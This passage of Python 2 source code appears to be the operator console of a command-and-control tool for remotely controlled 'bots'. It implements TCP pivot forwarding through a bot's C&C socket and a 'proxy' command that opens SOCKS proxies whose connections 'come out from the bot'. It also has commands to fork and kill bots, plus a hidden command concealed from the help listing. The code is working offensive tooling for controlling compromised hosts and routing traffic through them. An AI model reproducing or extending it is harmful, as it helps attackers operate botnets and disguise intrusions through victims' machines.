bouncer_1 = TCPForward(connect_sock, accept_sock)
bouncer_2 = TCPForward(accept_sock, connect_sock)
bouncer_1.start()
bouncer_2.start()
# Nobody uses this, but we need it somewhere so the
# garbage collector doesn't destroy our objects.
# TODO review if this is actually true...
self.current.bouncers = (bouncer_1, bouncer_2)
finally:
# Try to re-select the same bot when exiting the shell.
# We need to do this because the pivot reuses the C&C socket,
# so the bot mut reconnect in the background with a new socket.
sleep(0.1)
self.current = self.listener.bots.get(uuid, None)
# Just cleanup and error handling below.
except:
try:
connect_sock.shutdown(2)
except:
pass
try:
connect_sock.close()
except:
pass
raise
except:
try:
accept_sock.shutdown(2)
except:
pass
try:
accept_sock.close()
except:
pass
raise
def do_proxy(self, line):
"""
\x1b[32m\x1b[1mproxy\x1b[0m [\x1b[33m\x1b[1mls\x1b[0m]
\x1b[32m\x1b[1mproxy\x1b[0m [\x1b[33m\x1b[1madd\x1b[0m] <\x1b[34m\x1b[1mport\x1b[0m> [\x1b[34m\x1b[1mbind address\x1b[0m] [\x1b[34m\x1b[1musername\x1b[0m] [\x1b[34m\x1b[1mpassword\x1b[0m]
\x1b[32m\x1b[1mproxy\x1b[0m \x1b[33m\x1b[1mrm\x1b[0m <\x1b[34m\x1b[1mport\x1b[0m>
Opens a SOCKS proxy on the given local port.
Proxied connections will come out from the bot.
Subcommands are:
\x1b[33m\x1b[1mls\x1b[0m Lists the currently active proxies
\x1b[33m\x1b[1madd\x1b[0m Adds a new proxy
\x1b[33m\x1b[1mrm\x1b[0m Removes an active proxy
Arguments are:
\x1b[33m\x1b[1mbind address\x1b[0m Address to bind to (default: \x1b[34m\x1b[1m127.0.0.1\x1b[0m)
\x1b[33m\x1b[1mport\x1b[0m Port to listen on, also identifies the proxy
\x1b[33m\x1b[1musername\x1b[0m Optional username (if set, password must set too)
\x1b[33m\x1b[1mpassword\x1b[0m Optional password\n"""
# This command has a tricky syntax with various subcommands.
# They are listed below, along with helpful aliases.
valid_commands = {
"a": "add",
"r": "rm",
"l": "ls",
}
# Parse the command arguments.
try:
args = list(split(line, comments=True))
# Trivial case (no arguments at all).
# This is the same as the "ls" subcommand.
if not args:
command = "ls"
port = None
else:
# Next easy case: no subcommand, just a port number.
# That is shorthand for the "add" subcommand.
# To make the logic easier we will just insert it.
try:
int(args[0])
args.insert(0, "add")
except ValueError:
pass
# Get the subcommand.
# If an alias has been used, convert it to the full name.
command = args.pop(0)
command = valid_commands.get(command, command)
assert command in valid_commands.values()
# Parse the "add" subcommand arguments.
if command == "add":
port = int(args.pop(0))
assert 0 < port < 65536
if args:
bind_addr = args.pop(0)
bind_addr = inet_ntoa(inet_aton(bind_addr))
if args:
username = args.pop(0)
password = args.pop(0) # must be used together
assert not args
else:
username = ""
password = ""
else:
bind_addr = "127.0.0.1"
username = ""
password = ""
# Parse the "rm" subcommand arguments.
elif command == "rm":
port = int(args.pop(0))
assert 0 < port < 65536
assert not args
# Parse the "ls" subcommand arguments.
elif command == "ls":
assert not args
# Should never reach here.
else:
raise AssertionError()
# On error show a help message.
except Exception:
#print_exc() # XXX DEBUG
self.onecmd("help proxy")
return
# Execute the "add" subcommand.
if command == "add":
# A bot must be selected.
if self.current is None:
print Fore.YELLOW + "Error: no bot selected" + Style.RESET_ALL
return
# The bot must not be busy.
if self.is_bot_busy():
print Fore.YELLOW + "Bot is busy" + Style.RESET_ALL
return
# The port must be free.
if port in self.proxies:
print Fore.YELLOW + "Error: port is already in use" + Style.RESET_ALL
return
# Automatically fork the bot so we can keep using it.
uuid = self.current.system_fork()
# Create the SOCKSProxy.
proxy = SOCKSProxy(self.listener, self.current.uuid, bind_addr, port, username, password)
# Add it to the dictionary.
self.proxies[port] = proxy
# Launch the proxy.
proxy.start()
# With any luck the fork of the bot has already connected.
# Try selecting it if we can. If we can't at least deselect it.
sleep(0.1)
self.current = self.listener.bots.get(uuid, None)
# Execute the "rm" subcommand.
elif command == "rm":
# If there is no proxy at that port, complain.
if port not in self.proxies:
print Fore.YELLOW + ("No proxy on port %d" % port) + Style.RESET_ALL
return
# Remove the proxy from the dictionary and kill it.
self.proxies.pop(port).kill()
# Execute the "ls" subcommand.
elif command == "ls":
# If we had no active proxies, just show an error message.
if not self.proxies:
print Fore.YELLOW + "No active proxies right now" + Style.RESET_ALL
print "(Use 'help proxy' to show the help)"
return
# We will show the list of proxies in an ASCII art table.
# Same logic as the list of bots.
table = Texttable()
table.set_deco(Texttable.HEADER)
table.set_cols_dtype(("i", "t", "t", "t", "t", "t"))
table.set_cols_align(("l", "c", "c", "c", "c", "c"))
table.set_cols_valign(("t", "t", "t", "t", "t", "t"))
table.set_cols_width((len(str(len(self.proxies))), 36, 15+2, 5+2, 15+1, 4+2))
table.add_rows((("#", "UUID", "Outgoing IP", "Port", "Bind IP", "Auth"),), header = True)
i = 0
for port, proxy in self.proxies.items():
i += 1
uuid = proxy.uuid
bot = self.listener.bots[uuid]
index = self.listener.bots.keys().index(uuid)
table.add_row((
index,
uuid,
"\x02" + bot.from_addr[0] + "\x04",
("\x03" if proxy.alive else "\x01") + str(port) + "\x04",
"\x04" + proxy.bind_addr,
("\x03yes\x04" if proxy.username and proxy.password else "\x01no\x04"),
))
text = table.draw()
text = text.replace("\x01", " " + Fore.RED + Style.BRIGHT)
text = text.replace("\x02", " " + Fore.BLUE + Style.BRIGHT)
text = text.replace("\x03", " " + Fore.GREEN + Style.BRIGHT)
text = text.replace("\x04", Style.RESET_ALL + " ")
print
print text
print
# Should never reach here.
else:
raise AssertionError()
def do_kill(self, line):
"""
\x1b[32m\x1b[1mkill\x1b[0m
Kill the currently selected bot.
This command takes no arguments.\n"""
# A bot must be selected.
if self.current is None:
print Fore.YELLOW + "Error: no bot selected" + Style.RESET_ALL
return
# The bot must not be busy.
if self.is_bot_busy():
print Fore.YELLOW + "Bot is busy" + Style.RESET_ALL
return
# Parse the arguments, on error show help.
try:
assert not split(line, comments=True)
except Exception:
raise
self.onecmd("help kill")
return
# Kill the currently selected bot.
# If the bot refuses to die (they can do that, yes)
# an exception will be raised at this point.
self.current.system_exit()
# Deselect the bot, since we know it's dead now.
self.current = None
# Scary stuff below! :o)
if "play" in globals():
darknet = "tor"
filename = "malna.png"
bitcoins = 13
secret = "".join([x[1:].encode(darknet[::-1]+str(bitcoins)) for x in os.path.splitext(filename)])
del darknet
del filename
del bitcoins
def get_names(self):
secret = "do_" + Console.secret
names = Cmd.get_names(self)
if secret in names:
names.remove(secret)
return names
# Dunno about you reversing it but I had fun coding this :D
if "play" in globals():
setattr(Console, "do_" + Console.secret, play)
##############################################################################
# The bit that launches the console itself.
# Main function. Assumes colorama has been initialized elsewhere.
def main(args = None):
# If no arguments are given, use the system ones.
if args is None:
args = sys.argv[1:]
# Load the interactive console.
with Console(args) as c:
# Show the intro banner but only the first time.
skip_intro = False
# We need to put this in a loop because the base class
# provided by Python is a bit silly and just dies whenever a
# command raises an exception, we obviously don't want that.
while True:
try:
# Run the command loop, showing the banner only once.
if skip_intro:
c.cmdloop(intro = "")
else:
c.cmdloop()
# If we got here that means the exit command was used.
break
# Show bot errors in a pretty way.
except BotError, e:
print Fore.RED + Style.BRIGHT + str(e) + Style.RESET_ALL
# Quit silently with Control+C.
except KeyboardInterrupt:
print
break
# Show all other exceptions as Python tracebacks.
# Ugly, but easier to debug. You'll thank me.
except Exception:
print_exc()
# If we got here this is not the first time so skip the banner.
skip_intro = True
if __name__ == "__main__":
main() # colorama already initialized when imported
deinit() # cleanup colorama
